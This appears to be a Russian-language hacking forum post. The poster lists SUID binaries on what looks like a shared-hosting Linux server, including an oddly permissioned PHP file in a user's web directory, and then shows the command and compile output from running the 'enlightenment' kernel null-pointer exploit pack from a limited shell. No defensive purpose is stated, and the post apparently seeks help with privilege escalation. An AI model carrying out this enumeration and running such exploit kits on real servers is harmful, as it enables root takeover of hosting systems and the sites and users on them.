    -r-sr-xr-x 1 root root 23736 Aug  4  2014 /usr/local/lsws/bin/lscgid.4.2.13
    -r-sr-xr-x 1 root root 19848 Nov 19  2015 /usr/local/lsws/bin/lscgid.5.0.8
    -r-sr-xr-x 1 root root 19848 Jul 22  2015 /usr/local/lsws/bin/lscgid.5.0.2
    -r-sr-xr-x 1 root root 21984 Jan 12  2012 /usr/local/lsws/bin/lscgid.4.1.10
    -r-sr-xr-x 1 root root 23736 Jun 10  2014 /usr/local/lsws/bin/lscgid.4.2.12
    -r-sr-xr-x 1 root root 19848 Apr 18 09:35 /usr/local/lsws/bin/lscgid.5.1.4
    -r-sr-xr-x 1 root root 19848 Apr 18 10:51 /usr/local/lsws/bin/lscgid.5.0.15
    -r-sr-xr-x 1 root root 19848 Jul 20 09:55 /usr/local/lsws/bin/lscgid.5.1.7
    -r-sr-xr-x 1 root root 23736 Jan 14  2015 /usr/local/lsws/bin/lscgid.4.2.20
    -r-sr-xr-x 1 root root 19848 Aug 31  2015 /usr/local/lsws/bin/lscgid.5.0.5
    -r-sr-xr-x 1 root root 23736 Feb  4  2015 /usr/local/lsws/bin/lscgid.4.2.21
    -r-sr-xr-x 1 root root 19848 Mar 14  2016 /usr/local/lsws/bin/lscgid.5.0.14
    -r-sr-xr-x 1 root root 23736 Nov 18  2013 /usr/local/lsws/bin/lscgid.4.2.5
    -r-sr-xr-x 1 root root 23736 Oct  9  2014 /usr/local/lsws/bin/lscgid.4.2.17
    -r-sr-xr-x 1 root root 23736 Oct  2  2014 /usr/local/lsws/bin/lscgid.4.2.16
    -r-sr-xr-x 1 root root 23736 Nov 25  2014 /usr/local/lsws/bin/lscgid.4.2.19
    -r-sr-xr-x 1 root root 19848 Oct 13  2015 /usr/local/lsws/bin/lscgid.5.0.7
    -r-sr-xr-x 1 root root 23736 Oct 31  2014 /usr/local/lsws/bin/lscgid.4.2.18
    -r-sr-xr-x 1 root root 23736 Aug 14  2014 /usr/local/lsws/bin/lscgid.4.2.14
    -r-sr-xr-x 1 root root 23736 Apr  8  2014 /usr/local/lsws/bin/lscgid.4.2.6
    -r-sr-xr-x 1 root root 23736 Apr  9  2014 /usr/local/lsws/bin/lscgid.4.2.9
    -r-sr-xr-x 1 root root 23736 May 22  2014 /usr/local/lsws/bin/lscgid.4.2.11
    -r-sr-xr-x 1 root root 19848 Aug 17  2015 /usr/local/lsws/bin/lscgid.5.0.4
    -r-sr-xr-x 1 root root 19848 Jul 13 09:42 /usr/local/lsws/bin/lscgid.5.1.6
    -r-sr-xr-x 1 root root 23736 Apr  1  2014 /usr/local/lsws/bin/lscgid.4.2.7
    -r-sr-xr-x 1 root root 23736 Jun  1  2015 /usr/local/lsws/bin/lscgid.4.2.23
    -r-sr-xr-x 1 root root 19848 Dec  6  2015 /usr/local/lsws/bin/lscgid.5.0.9
    -r-sr-xr-x 1 root root 23736 Apr  9  2014 /usr/local/lsws/bin/lscgid.4.2.8
    -r-sr-xr-x 1 root root 19848 May 25 12:28 /usr/local/lsws/bin/lscgid.5.1.5
    -r-sr-xr-x 1 root root 23736 Sep 29  2013 /usr/local/lsws/bin/lscgid.4.2.4
    -r-sr-xr-x 1 root root 19848 Jun 24  2015 /usr/local/lsws/bin/lscgid.5.0
    -rws--x--x 1 root root 14280 May 10 17:11 /usr/libexec/pt_chown
    -rws--x--x 1 vcsa root 11208 May 11 00:24 /usr/libexec/mc/cons.saver
    -rwsr-xr-x 1 root root 257824 May 12 07:52 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 14368 Mar 17  2015 /usr/libexec/polkit-1/polkit-agent-helper-1
    -rws--x--x 1 root root 20184 May 11 01:58 /usr/bin/chfn
    -rws--x--x 1 root root 20056 May 11 01:58 /usr/bin/chsh
    -rwsr-xr-x 1 root root 40240 May 11 00:23 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 30768 Nov 23  2015 /usr/bin/passwd
    -rwsr-xr-x 1 root root 75640 May 11 00:23 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 70480 May 11 00:23 /usr/bin/chage
    -rwsr-xr-x 1 root root 22544 Mar 17  2015 /usr/bin/pkexec
    -rwsr-xr-x 1 root root 54496 Feb 19  2015 /usr/bin/at
    ---s--x--x 1 root root 123832 May 11 02:13 /usr/bin/sudo
    ---s--x--- 1 root stapusr 183072 May 11 02:40 /usr/bin/staprun
    -rwsr-xr-x 1 root root 21302 May  5  2014 /usr/share/doc/fping-3.10/ChangeLog
    -rwsr-xr-x 1 root root 1067 May  5  2014 /usr/share/doc/fping-3.10/COPYING
    -rwsr-xr-x 1 root root 1496 May  5  2014 /usr/share/doc/fping-3.10/README
    -rwsr-xr-x 1 root root 92815 May  7  2014 /usr/sbin/fping6
    -rwsr-xr-x 1 root root 9000 May 11 22:34 /usr/sbin/usernetctl
    -rwsr-xr-x 1 root root 1274440 Mar  4  2016 /usr/sbin/exim
    -rws--x--x 1 root root 42288 Aug 22  2010 /usr/sbin/userhelper
    -rwsr-xr-x 1 root root 42792 May  7  2014 /usr/sbin/fping
    -rwsr-xr-x 1 root root 34840 May 11 02:18 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 10272 May 11 02:18 /sbin/pam_timestamp_check
    -rwsrwsrwt 1 p2267 p2267 72844 Sep 18 19:16 /home/p2267/www/****.ru/content/pagesinfo.php
    


    Пробовал enlightenment, результат следующий:
    Code:
    sh-4.1$ tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
    <ent.tgz && cd enlightenment && ./run_null_exploits.sh                      
    Compiling exp_abacus.c...OK.
    Compiling exp_cheddarbay.c...OK.
    Compiling exp_ingom0wnar.c...OK.
    Compiling exp_moosecox.c...OK.
    Compiling exp_paokara.c...OK.
    Compiling exp_powerglove.c...OK.
    Compiling exp_sieve.c...OK.
    Compiling exp_therebel.c...OK.
    Compiling exp_vmware.c...failed.
    Compiling exp_wunderbar.c...OK.
    Pulseaudio does not exist!
    [+] Personality set to: PER_SVR4
    sh-4.1$
    

    Спасибо!